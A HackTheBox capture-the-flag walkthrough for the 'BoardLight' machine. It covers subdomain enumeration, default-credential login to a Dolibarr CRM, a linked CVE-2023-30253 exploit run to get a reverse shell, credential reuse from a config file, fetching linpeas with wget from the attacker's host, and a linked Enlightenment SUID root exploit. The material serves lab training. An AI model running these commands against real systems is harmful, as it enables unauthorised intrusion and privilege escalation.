You are currently viewing BoardLight HTB Walkthrough

BoardLight HTB Walkthrough

BoardLight is an easy HackTheBox Linux machine, in this writeup we’re going to capture the user flag from a vulnerable CRM and then enumerate the OS for privilege escalation and capture the root flag.

1- Nmap Result : 

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

We have to add “board.htb” to our “/etc/hosts” file and after that, let’s scan if there’s any subdommain :

$ gobuster vhost -u http://board.htb -w /usr/share/wordlists/subdomains-top1million-5000.txt --append-domain

crm.board.htb

That’s great, we found a subdomain, after adding crm.board.htb to “/etc/hosts” we can see in our navigator and it’s the Dolibarr CRM.

2- Exploitation and User Flag

after that, we can easily use “admin:admin” credentials to login, but after a lot of time spended, i’ve found nothing.

We can search on google for “Dolibarr Exploit” and we will find “CVE-2023-30253” a POC on this link to get a reverse shell : https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

$ python exploit.py  http://crm.board.htb admin admin YOUR_IP YOUR_PORT

Finally, we have our reverse shell with user www-data,but we can’t capture the user flag and there’s a user directory named “larissa” that i suscpect to have what we’re looking for.

After enumerating Dolibarr files, we found an interesting file : 

$ cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

$dolibarr_main_db_pass='serverfun2$2023!!';

the config file contain a password for a database that i used to ssh with larissa and captured our User flag !

3- PrivEsc and Root Flag

for this part, i usually run linpeas.sh script that you can download from this link.

to run linpeas.sh on the target machine you should follow those steps :

$ cd LINPEAS_LOCATION_ON_YOUR_MACHINE    // folder containing linpeas.sh
$ php -S 0.0.0.0:80                      // create a server on this folder
$ wget http://YOUR_IP/linpeas.sh         // download linpeas.sh to target machine
$ chmod 777 linpeas.sh                   // give linpeas the permission to execute
$ ./linpeas.sh                           // execute linpeas.sh script


╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                       
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device                                                                                              
-rwsr-sr-x 1 root root 15K Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)

Enlightenment is a Window Manager, Compositor and Minimal Desktop for Linux, there was a zero-day vulnerability with
“CVE-2022-37706” and i found a good exploit to use on this link to get the Root Flag.

hacked logo

Finally ! we managed to hack this easy linux machine, i hope you do so while enjoying following these steps.

If you have any question or detail to add, please feel free to contact me here.